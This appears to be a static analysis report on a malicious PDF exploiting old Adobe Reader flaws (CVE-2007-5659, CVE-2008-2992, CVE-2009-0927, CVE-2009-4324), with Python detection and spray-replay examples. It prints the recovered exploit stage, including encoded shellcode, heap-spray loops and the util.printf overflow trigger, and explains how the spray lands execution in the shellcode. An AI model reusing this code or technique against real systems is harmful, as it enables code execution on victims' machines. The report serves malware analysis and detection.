Malicious PDF — malware analysis report

Static analysis result for SHA-256 10b3a5c7c2c75fdc…

Verdict: MALICIOUS
File type: PDF
Size: 118.6 KB
MD5: f4787ec213135e8e4ded4446fbce2ced
SHA-1: 2135756f2824dff58171d6cb7aaf6c6edd53f075
SHA-256: 10b3a5c7c2c75fdc50532db77a1d25973b771f40d8c82458786ca473c0a8aa90
Risk score: 616

Malware Insights

MITRE ATT&CK

  • T1203 Exploitation for Client Execution
  • T1059.007 Command and Scripting Interpreter: JavaScript

This PDF carries heavily obfuscated JavaScript that targets several known Adobe Reader vulnerabilities: CVE-2009-4324 (media.newPlayer), CVE-2009-0927 (Collab.getIcon), CVE-2007-5659 (Collab.collectEmailInfo) and CVE-2008-2992 (util.printf). The recovered stage heap-sprays embedded shellcode and then calls the vulnerable API for whichever Reader version opens the file. The PDF_JS_EXPLOIT_CLUSTER and PDF_ADOBE_READER_MULTI_CVE_JS_KIT heuristics characterize this as exploit staging; what the shellcode does once it runs, including any second-stage payload it downloads and executes, was not recovered by static analysis. The ClamAV detection Pdf.Exploit.Agent-36086 corroborates the verdict.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (12)

  • media.newPlayer (CVE-2009-4324) [critical; CVE match: exact; rule CVE_2009_4324]
    PDF JavaScript calls media.newPlayer. CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin reached through Doc.media.newPlayer(); it was exploited as a zero-day in December 2009. Identified after JavaScript deobfuscation.
  • Collab.getIcon (CVE-2009-0927) [critical; CVE match: exact; rule CVE_2009_0927]
    PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack-based buffer overflow in Adobe Reader triggered by passing an overlong argument to Collab.getIcon(); it allows arbitrary code execution as the user opening the file. Identified after JavaScript deobfuscation.
  • Collab.collectEmailInfo (CVE-2007-5659) [critical; CVE match: exact; rule CVE_2007_5659]
    PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by an overlong msg field (normally combined with a heap spray) passed to Collab.collectEmailInfo(); it is one of the earliest of the Acrobat JavaScript API exploits. Identified after JavaScript deobfuscation.
  • util.printf (CVE-2008-2992) [critical; CVE match: exact; rule CVE_2008_2992]
    PDF JavaScript calls util.printf(). CVE-2008-2992 is a stack-based buffer overflow in Adobe Reader triggered by a format string with an oversized field width (the recovered stage below uses "%45000f"); it was widely exploited in the wild after disclosure. Identified after JavaScript deobfuscation.
  • Pidief-style multi-CVE JavaScript dispatcher [critical; CVE match: likely; rule PDF_PIDIEF_MULTI_CVE_DISPATCH]
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 [critical; rule CLAMAV_DETECTION]
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086.
  • Multi-CVE Adobe Reader JavaScript exploit kit [critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT]
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than isolated API keywords: the PDF selects an old Reader vulnerability by viewer version and runs a heap-sprayed Acrobat JavaScript exploit path for it.
  • JavaScript action [low; 3 related findings; rule PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster [critical; rule PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behaviour.
  • Large comment-padded JavaScript eval stager [high; rule PDF_JS_LARGE_COMMENT_PADDED_EVAL]
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and its recovered stage inside noise; it is not normal PDF form automation.
  • Embedded JS stream [low; rule PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact [info; rule EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
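The three correlated rules above (comment-padded eval stager, version-gated multi-CVE kit, Pidief dispatcher) are easier to reason about as code. The following Python is an added example written for this page; it is not the analyzer's own rule engine, and the rule names it emits are approximations of the report's rule IDs rather than their real logic. The sample stage and the stager wrapper (`SAMPLE_STAGE`, `build_padded_stager`) are constructed here with placeholder arguments and no shellcode; the CVE lookup in `SINKS` is built for the example.

```python
import re

# Acrobat JavaScript sinks the report's CVE rules key on, mapped to the CVE
# each call is the canonical trigger for. Lookup built for this example.
SINKS = {
    "Collab.collectEmailInfo": "CVE-2007-5659",
    "util.printf": "CVE-2008-2992",
    "Collab.getIcon": "CVE-2009-0927",
    "media.newPlayer": "CVE-2009-4324",
}
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(([^)]*)\)")
PRINTF_WIDTH = re.compile(r'util\.printf\s*\(\s*"%(\d+)f"')


def strip_block_comments(js):
    """Drop /* ... */ padding so the decoder call becomes visible."""
    return BLOCK_COMMENT.sub("", js)


def recover_fromcharcode_stage(js):
    """Statically decode the first String.fromCharCode(n, n, ...) literal.
    Returns None when the argument is not a plain numeric list; in that case
    a JS engine, not string matching, is needed to recover the stage."""
    m = FROMCHARCODE.search(strip_block_comments(js))
    if m is None:
        return None
    try:
        codes = [int(t.strip(), 0) for t in m.group(1).split(",") if t.strip()]
    except ValueError:
        return None
    return "".join(chr(c) for c in codes)


def is_comment_padded_eval_stager(js, min_comment_len=64):
    """Shape behind PDF_JS_LARGE_COMMENT_PADDED_EVAL: long block comments
    wrapped around a fromCharCode decoder whose output is passed to eval."""
    long_comments = [c for c in BLOCK_COMMENT.findall(js) if len(c) >= min_comment_len]
    return bool(long_comments) and "String.fromCharCode" in js and "eval(" in js


def score_stage(stage):
    """Approximate the report's rule names on a recovered stage."""
    hits = {api: cve for api, cve in SINKS.items() if api in stage}
    version_gated = "app.viewerVersion" in stage
    findings = sorted(hits.values())
    if version_gated and len(hits) >= 2:
        findings.append("PDF_ADOBE_READER_MULTI_CVE_JS_KIT")
    # Pidief template: version branch plus 2+ of the three classic sinks,
    # where util.printf only counts when its format carries a big field width.
    classic = {api for api in hits if api.startswith("Collab.")}
    if any(int(w) >= 1000 for w in PRINTF_WIDTH.findall(stage)):
        classic.add("util.printf")
    if version_gated and len(classic) >= 2:
        findings.append("PDF_PIDIEF_MULTI_CVE_DISPATCH")
    return findings


def triage(raw_js):
    """Run the stager check on the raw stream, then score what it decodes to."""
    stage = recover_fromcharcode_stage(raw_js)
    return {
        "padded_eval_stager": is_comment_padded_eval_stager(raw_js),
        "stage_recovered": stage is not None,
        "findings": score_stage(stage if stage is not None else raw_js),
    }


# Constructed sample in the dispatcher shape (placeholder arguments, no
# shellcode): branch on viewer version, call one sink per branch.
SAMPLE_STAGE = """
var v = app.viewerVersion;
if (v < 8) { Collab.collectEmailInfo({subj: "", msg: "..."}); }
else if (v < 9) { util.printf("%45000f", 1); }
else { Collab.getIcon("..."); }
"""


def build_padded_stager(stage, pad=80):
    """Wrap a stage the way the carved stream does: fromCharCode + eval,
    buried in long block comments (deterministic filler stands in for the
    random-looking text a real kit emits)."""
    codes = ",".join(str(ord(ch)) for ch in stage)
    junk = "/*" + "x" * pad + "*/"
    return f"function cOk(gQF){{{junk}eval({junk}String.fromCharCode({codes}){junk});}}"


if __name__ == "__main__":
    print(triage(build_padded_stager(SAMPLE_STAGE)))
```

Static decoding only works while the fromCharCode argument is a literal list; kits that compute the character codes at runtime (or route them through unescape, substitution tables or multiple eval layers, as the "substitution-hex" label on the carved stage suggests) need an instrumented JavaScript engine with the Acrobat objects stubbed out, after which the same `score_stage` check applies to whatever the engine hands back.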

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0006_000.js
SHA-256: f27dfcb7b967db55363db759bb9ddb0185e2f3245f6a492440d93c8c02f5ddd0
Kind: pdf-javascript-stream
Source: PDF /JS object 6 at offset 0x143
Size: 626,698 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 2 eval/decoder/string-building tokens and 42 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script):
function cOk(gQF){ /*
... (truncated)
Filename: legacy_pdfkit_stage_000.js
SHA-256: c055afd82b33e68f59454483ed7c9fd8374e09f5ba3da4bb813d154fc3f25546
Kind: deobfuscated-js (comment-padded, substitution/hex decoded JavaScript)
Source: decoded from the /JS stream at offset 0x143
Size: 10,413 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 12 eval/decoder/string-building tokens and 1 long base64-like blob)
Preview script (first 1,000 lines of the extracted script):
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u2EFF%u86ED%u4A10%uB64C%u2E10%u0DED%u2250%uF666%u830C%uF666%uAF18%u8629%uD1E7%u0D12%u95FC%u86A5%u2E10%u8687%uA078%u88A3%u46FC%u7875%u209A%u6985%uCEDE%uEE8D%uE423%uDD67%u1678%u2ACF%u46F7%uCF07%uC69A%u5D85%u0D9A%uEE04%u624B%u5BF7%uC278%u857A%uC61C%u87F2%u2E10%u8264%uAD3B%u8206%uEE1B%u7798%u4078%uF288%u4610%uEF9A%u477E%u79B9%u0645%uDFB4%uEE1B%u02E2%u2EE8%u86ED%uDE9B%uDE56%u2E10%uECED%u4610%uC2C4%u79F8%uCF85%u21FD%uEE93%u659B%uD90E%uCEF8%u86ED%uA710%uADE9%uC593%u8DE9%u5BD0%u0B1C%u2E95%u86EF%u7E10%u7985%u2E10%u79ED%u1A45%u0360%u2A10%u86ED%u4440%uECED%uA310%u8668%u2E12%uD6ED%u7BEF%u0BD5%u2EA5%u86E9%u8210%u46E7%uD565%u41A3%u0016%uFE88%uE975%u82AB%u2E10%u86ED%uAB9D%u82ED%u2E10%u4FDE%u7E41%uD312%u6E2C%u02E2%u2E90%u86ED%uA758%uCAA8%u2E78%u86AD%u4410%u79AD%u6645%u46E6%u4064%uC364%u4470%uECED%u4410%uECED%u4410%u79ED%u7E45%u46E6%u7464%u8687%u2E78%u86ED%u4414%uECED%uC710%u8647%u2E10%u79BD%u7A45%u46E6%u6C64%uC364%uA378%uE2A8%u4640%uC6ED%u2E10%uF312%uD170%uEE98%u7BEF%u8DB5%u5AD0%u0DF8%u4A55%u46E6%u2064%uF312%uD174%uE698%u5BEF%u79A1%u6E45%u5306%u5BEF%u79A1%u6A45%u4FC6%u7F51%u0360%u2A10%u86ED%uD140%uAAB8%uD17A%uD312%u7B20%u6A66%u539B%u8DE5%u5AEF%uD5A6%uF09B%u0DBB%u1263%uF266%u5623%u75EE%uA546%uA69B%uDD13%u4FDE%u6F59%u8540%u78D3%u70DE%u901F%uBEFD%u5AC6%u47E5%u23DE%u74EE%uC550%uBD1C%u70EE%u6398%uA54A%u0D06%u0A4A%u5BEE%uA576%uCDE1%u749B%u85F1%uA5CD%u0DE9%uEB13%uDDB3%u2CFB%u46DE%uEC4D%u86E9%u7FF8%u7912%u46EF%uF299%u1460%uA9C2%u5D71%uE784%u5E7E%uF482%u5A7E%uEF9F%u0060%uE98E%u017D%uF499%u4A71%uA988%u4D2F%uB7D0%u5D36%uE284%u1E2D%uE2DE%u1976%uE089%u1B25%uE3DC%u1F22%uBFDF%u4824%uB5DC%u1A28%uE4DD%u1C74%uB6D5%u1F27%uE3D5%u0828%uBB9E%u2E23%u86ED%u0010");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u2EFF%u86ED%u4A10%uB64C%u2E10%u0DED%u2250%uF666%u830C%uF666%uAF18%u8629%uD1E7%u0D12%u95FC%u86A5%u2E10%u8687%uA078%u88A3%u46FC%u7875%u209A%u6985%uCEDE%uEE8D%uE423%uDD67%u1678%u2ACF%u46F7%uCF07%uC69A%u5D85%u0D9A%uEE04%u624B%u5BF7%uC278%u857A%uC61C%u87F2%u2E10%u8264%uAD3B%u8206%uEE1B%u7798%u4078%uF288%u4610%uEF9A%u477E%u79B9%u0645%uDFB4%uEE1B%u02E2%u2EE8%u86ED%uDE9B%uDE56%u2E10%uECED%u4610%uC2C4%u79F8%uCF85%u21FD%uEE93%u659B%uD90E%uCEF8%u86ED%uA710%uADE9%uC593%u8DE9%u5BD0%u0B1C%u2E95%u86EF%u7E10%u7985%u2E10%u79ED%u1A45%u0360%u2A10%u86ED%u4440%uECED%uA310%u8668%u2E12%uD6ED%u7BEF%u0BD5%u2EA5%u86E9%u8210%u46E7%uD565%u41A3%u0016%uFE88%uE975%u82AB%u2E10%u86ED%uAB9D%u82ED%u2E10%u4FDE%u7E41%uD312%u6E2C%u02E2%u2E90%u86ED%uA758%uCAA8%u2E78%u86AD%u4410%u79AD%u6645%u46E6%u4064%uC364%u4470%uECED%u4410%uECED%u4410%u79ED%u7E45%u46E6%u7464%u8687%u2E78%u86ED%u4414%uECED%uC710%u8647%u2E10%u79BD%u7A45%u46E6%u6C64%uC364%uA378%uE2A8%u4640%uC6ED%u2E10%uF312%uD170%uEE98%u7BEF%u8DB5%u5AD0%u0DF8%u4A55%u46E6%u2064%uF312%uD174%uE698%u5BEF%u79A1%u6E45%u5306%u5BEF%u79A1%u6A45%u4FC6%u7F51%u0360%u2A10%u86ED%uD140%uAAB8%uD17A%uD312%u7B20%u6A66%u539B%u8DE5%u5AEF
... (truncated)
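The spray arithmetic in util_printf() above is worth replaying without the shellcode. This Python is an added example for this page, not code from the sample or from the analyzer: it reproduces the string-growth loop of the recovered stage on string lengths alone (JavaScript string length counts UTF-16 code units, two bytes each), so a reader can see how large each array element is, how much memory 1400 of them occupy, and whether the 0x0A0A0A0A address implied by the filler bytes falls inside that range. `payload_units=300` is a stand-in for the real shellcode length, and `target_covered` assumes the sprayed strings grow contiguously from `heap_base`; both are assumptions of the example.

```python
import re

UNESCAPE_UNIT = re.compile(r"%u[0-9A-Fa-f]{4}")


def unescape_units(s):
    """JS string length produced by unescape() over a %uXXXX string:
    one UTF-16 code unit (2 bytes) per %uXXXX token."""
    return len(UNESCAPE_UNIT.findall(s))


def spray_geometry(payload_units, nop_units=4, headersize=20,
                   limit=0x40000, count=1400):
    """Replay the string-growth arithmetic of util_printf() in the recovered
    stage, tracking JS string lengths (UTF-16 code units) instead of the
    strings themselves. Defaults are the constants in the stage; payload_units
    is len(unescape(payload)) for the shellcode string (assumed here)."""
    heapblock = nop_units + payload_units          # heapblock = nop + payload
    spray = headersize + heapblock                 # spray = headersize + heapblock.length
    bigblock = 2                                   # unescape("%u0A0A%u0A0A") is 2 units
    while bigblock < spray:                        # while(bigblock.length<spray) bigblock+=bigblock
        bigblock *= 2
    fillblock = spray                              # bigblock.substring(0, spray)
    block = bigblock - spray                       # bigblock.substring(0, bigblock.length-spray)
    while block + spray < limit:                   # while(block.length+spray<0x40000)
        block = block + block + fillblock          #   block = block + block + fillblock
    element = block + heapblock                    # mem_array[i] = block + heapblock
    return {
        "element_units": element,
        "element_bytes": element * 2,
        "total_bytes": element * 2 * count,
    }


def target_covered(total_bytes, target=0x0A0A0A0A, heap_base=0):
    """Coverage check under the assumption that the sprayed strings are laid
    out contiguously upward from heap_base (an assumption, not a measurement)."""
    return heap_base <= target < heap_base + total_bytes


if __name__ == "__main__":
    g = spray_geometry(payload_units=300)   # 300 units stands in for the real shellcode
    print(g, target_covered(g["total_bytes"]))
```

With a 300-unit payload the loop stops the first time block.length + spray reaches exactly 0x40000, so every mem_array element is just under 512 KiB and 1400 of them sum to roughly 734 MB, comfortably past 0x0A0A0A0A (about 168 MB). Each element ends with the nop + shellcode block, so a return into 0x0A0A0A0A lands in filler that decodes as the two-byte instruction `or cl,[edx]` and slides forward into the shellcode as long as EDX points at readable memory. The `%45000f` format width in the final util.printf call is the CVE-2008-2992 trigger; the spray only exists to make the resulting control-flow hijack land somewhere useful.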